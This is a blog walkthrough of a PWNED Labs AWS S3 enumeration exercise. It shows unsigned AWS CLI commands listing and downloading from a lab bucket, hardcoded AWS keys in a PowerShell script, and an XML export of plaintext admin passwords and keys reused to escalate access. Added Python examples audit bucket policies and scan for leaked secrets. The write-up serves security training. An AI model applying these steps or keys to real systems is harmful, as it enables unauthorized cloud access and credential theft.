S3 Enumeration

aktran321

Khang Tran

Posted on November 21, 2024


PWNED Labs is a great resource to get your hands dirty with AWS Penetration Testing.

Today, I'll be going through the S3 Enumeration lab, showcasing how easy it is to access an S3 bucket!

Scope

It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.

Target

http://dev.huge-logistics.com


Inspection

We can see that the website uses an S3 bucket called dev.huge-logistics.com for storing static files such as images, CSS and JavaScript.

When we attempt to access https://s3.amazonaws.com/dev.huge-logistics.com/ and https://s3.amazonaws.com/dev.huge-logistics.com/static/, we get an Access Denied error.


So we can try accessing the bucket with the AWS CLI instead.

We specifically use the --no-sign-request flag.

This flag makes the CLI send the request unsigned, so we access the bucket anonymously, just as you would log in to a misconfigured FTP server that allows anonymous sign-in.

Basically, we are enumerating the S3 bucket without having to authenticate ourselves.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request

Now that we can see the contents of the bucket, we can try recursive enumeration.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive

But access is denied.

However, accessing the shared directory works, and we find a zip file that we can download.

Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33          0
2023-10-16 11:09:01        993 hl_migration_project.zip

Download

aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
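
For whoever owns a bucket like this, the following added example (not from the original post or the lab) audits a bucket policy for anonymous grants and evaluates the three unsigned listings used above. The post never shows the real policy, so WEAK_POLICY is a constructed assumption that would reproduce the observed behaviour; the evaluator handles only Allow statements with StringEquals conditions and ignores Deny statements.

```python
# Added example. WEAK_POLICY is constructed to match the behaviour in the
# walkthrough; the lab's real bucket policy is not shown on the page.
BUCKET = "arn:aws:s3:::dev.huge-logistics.com"
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
     "Action": "s3:ListBucket", "Resource": BUCKET,
     "Condition": {"StringEquals": {"s3:prefix": ["", "shared/"],
                                    "s3:delimiter": "/"}}},
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject",
     "Resource": [BUCKET + "/static/*", BUCKET + "/shared/*"]},
]}
# Hardened: anonymous users can fetch static assets only and cannot list.
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicStatic", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": BUCKET + "/static/*"},
]}

# Condition keys carried by the three unsigned listings in the walkthrough.
ROOT = {"s3:prefix": "", "s3:delimiter": "/"}            # aws s3 ls s3://bucket
RECURSIVE = {"s3:prefix": ""}                            # --recursive: no delimiter
SHARED = {"s3:prefix": "shared/", "s3:delimiter": "/"}   # aws s3 ls .../shared/

def as_list(value):
    return value if isinstance(value, list) else [value]

def is_anonymous_allow(stmt):
    return stmt.get("Effect") == "Allow" and stmt.get("Principal") in ("*", {"AWS": "*"})

def anonymous_grants(policy):
    """List (Sid, action) pairs that any unauthenticated caller is allowed."""
    return [(s.get("Sid"), a) for s in as_list(policy["Statement"])
            if is_anonymous_allow(s) for a in as_list(s["Action"])]

def anonymous_can_list(policy, request):
    """Evaluate an unsigned ListBucket request against StringEquals conditions."""
    for stmt in as_list(policy["Statement"]):
        if not is_anonymous_allow(stmt) or "s3:ListBucket" not in as_list(stmt["Action"]):
            continue
        cond = stmt.get("Condition", {}).get("StringEquals", {})
        # Every condition key must be present in the request and match a listed value.
        if all(k in request and request[k] in as_list(v) for k, v in cond.items()):
            return True
    return False

if __name__ == "__main__":
    for name, pol in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY)):
        print(name, anonymous_grants(pol),
              [anonymous_can_list(pol, r) for r in (ROOT, RECURSIVE, SHARED)])
```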

Unzipping the file reveals a PowerShell script.

Inside the file we discover hardcoded access keys!

Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

# Set the AWS region
Set-DefaultAWSRegion -Region $region

# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"

# Output log file
$logFile = "upload_log.txt"

# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
    $retries = 3
    while ($retries -gt 0) {
        try {
            $result = New-SECSecret -Name $secretName -SecretString $secretValue
            $logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
            Write-Output $logEntry
            Add-Content -Path $logFile -Value $logEntry
            return $true
        } catch {
            $retries--
            Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
        }
    }
    return $false
}

foreach ($secretNode in $xmlContent.Secrets.Secret) {
    # Implementing concurrency using jobs
    Start-Job -ScriptBlock {
        param($secretName, $secretValue)
        TryUploadSecret -secretName $secretName -secretValue $secretValue
    } -ArgumentList $secretNode.Name, $secretNode.Value
}

# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job

# Retrieve and display job results
$jobs | ForEach-Object {
    $result = Receive-Job -Job $_
    if (-not $result) {
        Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
    }
    # Clean up the job
    Remove-Job -Job $_
}

Write-Output "Batch upload complete!"


# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force

We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.

But let's first check which region the bucket was created in.

curl -I https://s3.amazonaws.com/dev.huge-logistics.com/

The bucket is in us-east-1.

Run

aws configure

And use

  • access-key: AKIA3SFMDAPOWOWKXEHU
  • secret-key: MwGe3leVQS6SDWYqlpe9cQG5KmU0UFiG83RX/gb9

Check our identity

aws sts get-caller-identity

This reveals an IAM user, pam-test.

With these credentials, we are able to access the admin directory, but cannot download the flag.

But we were able to reveal more files in the migration-files directory.

Download the XML file

aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
cat test-export.xml

We see even more privileged credentials!

Take note of the AWS IT Admin credentials.

Output

<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
    <CredentialEntry>
        <ServiceType>Oracle Database</ServiceType>
        <Hostname>oracle-db-server02.prod.hl-internal.com</Hostname>
        <Username>admin</Username>
        <Password>Password123!</Password>
        <Notes>Primary Oracle database for the financial application. Ensure strong password policy.</Notes>
    </CredentialEntry>
    <!-- HP Server Credentials -->
    <CredentialEntry>
        <ServiceType>HP Server Cluster</ServiceType>
        <Hostname>hp-cluster1.prod.hl-internal.com</Hostname>
        <Username>root</Username>
        <Password>RootPassword456!</Password>
        <Notes>HP server cluster for batch jobs. Periodically rotate this password.</Notes>
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>
        <AccountID>794929857501</AccountID>
        <AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
        <SecretAccessKey>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</SecretAccessKey>
        <Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
    </CredentialEntry>
    <!-- Iron Mountain Backup Portal -->
    <CredentialEntry>
        <ServiceType>Iron Mountain Backup</ServiceType>
        <URL>https://backupportal.ironmountain.com</URL>
        <Username>hladmin</Username>
        <Password>HLPassword789!</Password>
        <Notes>Account used to schedule tape collections and deliveries. Schedule regular password rotations.</Notes>
    </CredentialEntry>
    <!-- Office 365 Admin Account -->
    <CredentialEntry>
        <ServiceType>Office 365</ServiceType>
        <URL>https://admin.microsoft.com</URL>
        <Username>admin@company.onmicrosoft.com</Username>
        <Password>O365Password321!</Password>
        <Notes>Office 365 global admin account. Use for essential administrative tasks only and enable MFA.</Notes>
    </CredentialEntry>
    <!-- Jira Admin Account -->
    <CredentialEntry>
        <ServiceType>Jira</ServiceType>
        <URL>https://hugelogistics.atlassian.net</URL>
        <Username>jira_admin</Username>
        <Password>JiraPassword654!</Password>
        <Notes>Jira administrative account. Restrict access and consider using API tokens where possible.</Notes>
    </CredentialEntry>
</CredentialsExport>

AWS IT Admin

  • Access Key: AKIA3SFMDAPOQRFWFGCD
  • Secret Key: t21ERPmDq5C1QN55dxOOGTclN9mAaJ0bnL4hY6jP
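
Both the PowerShell script and the XML export above carried credentials in plain text. As an added example (not part of the original post or the lab), this is a check a team could run over files before they are uploaded to a bucket; it covers both formats seen here. The sample inputs are constructed, use AWS's documented example key pair, and the function and pattern names are assumptions of this sketch.

```python
import re

# AWS access key IDs: AKIA (long-term) or ASIA (temporary) plus 16 characters.
KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# Secret access keys are 40 base64-style characters with no longer run around them.
SECRET = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+]{40}(?![A-Za-z0-9/+=])")
# Plain-text password elements as used in the XML export format.
PASSWORD = re.compile(r"<Password>([^<]+)</Password>", re.I)

def redact(value):
    """Keep four characters for triage and mask the rest."""
    return value[:4] + "*" * (len(value) - 4)

def scan(text, window=3):
    """Return (line_no, kind, redacted_value) for each credential found."""
    findings, last_key_line = [], None
    for n, line in enumerate(text.splitlines(), 1):
        for m in KEY_ID.finditer(line):
            findings.append((n, "aws-access-key-id", redact(m.group())))
            last_key_line = n
        for m in SECRET.finditer(line):
            # Cut false positives: require a nearby key ID or a "secret" label.
            near_key = last_key_line is not None and n - last_key_line <= window
            if near_key or "secret" in line.lower():
                findings.append((n, "aws-secret-access-key", redact(m.group())))
        for m in PASSWORD.finditer(line):
            findings.append((n, "password", redact(m.group(1))))
    return findings

# Constructed samples in the two formats from the walkthrough.
SAMPLE_PS1 = "\n".join([
    '$accessKey = "AKIAIOSFODNN7EXAMPLE"',
    '$secretKey = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"',
    '$region = "us-east-1"',
])
SAMPLE_XML = "\n".join([
    "<CredentialEntry>",
    "    <Username>admin</Username>",
    "    <Password>ExamplePassw0rd!</Password>",
    "</CredentialEntry>",
    "<CredentialEntry>",
    "    <AccessKeyID>AKIAIOSFODNN7EXAMPLE</AccessKeyID>",
    "    <SecretAccessKey>wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</SecretAccessKey>",
    "</CredentialEntry>",
])

if __name__ == "__main__":
    for finding in scan(SAMPLE_PS1) + scan(SAMPLE_XML):
        print(finding)
```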

We can now see an export of user credit card information in cleartext!

